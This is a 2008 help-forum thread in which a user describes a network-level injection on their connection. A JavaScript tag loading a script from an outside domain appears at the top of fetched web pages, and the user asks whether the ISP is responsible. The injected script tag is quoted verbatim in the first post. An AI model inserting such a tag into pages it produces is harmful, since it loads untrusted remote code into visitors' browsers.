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Join Date: Jan 2008
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OS: Windows XP SP2
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Hi
I got a situation. Whenever I browse the net, I get the following line injected at the top of the HTML page. [syntax="javascript"] <SCRIPT LANGUAGE="javascript1.2" SRC="http://x.222360.com/un.js"></SCRIPT>[/syntax] If its not x.222360, its s.222360 etc. (I've added these to my hosts file) I formatted my hard-disk, re-installed my OS and it still persists. I tried a small php code to get the html contents using file_get_contents. [syntax="php-brief"] php file_get_contents.php > temp.txt[/syntax] Guess what ? That Javascript line still exists ! What I would like to know is, is this 100% confirmation that this issue is from my ISP's side & not from my PC ? I understand if all my browsers (FF 2.0.0.11, IE7, Safari 3.0.4, Opea 9.5 beta) are hikacked (Im never in admin mode anyway, only User), but a php code retrieving the contents ... I dont think php.exe got hijacked. Worse part is, it doesnt happen 100% of the time - say 65% - 85%. And it results in clogging of the network hence disconnection of the internet. Thanks |
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Join Date: Jan 2008
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Its a real shame that my thread has received 0 replies since 2 dayz.........its surely shows what is the quality of tech support you all are talking about.............newayz even after deleting my previous post......i still managed to get you my problem and let me tell u one thing its not a local phenomenon its happening in local networks of India , China and Russia till now can soon be spreaded to ur own country.............so beware guyz this thing is looking for you now.........and till then we would have resolved this problem by our own tech support..........
Regards, Rohit Jain. |
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Join Date: Jan 2008
Posts: 3
OS: Windows XP SP2
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Re: How to get rid of this JS !
so we have apparently solved the problem...........if ne1of u r interested to knw wat xactly was the problem and wat is its solution u can refer to
http://forums.devnetwork.net/viewtop...&sd=a&start=60 Last edited by chillpill_rohit; 01-24-2008 at 10:56 AM. |
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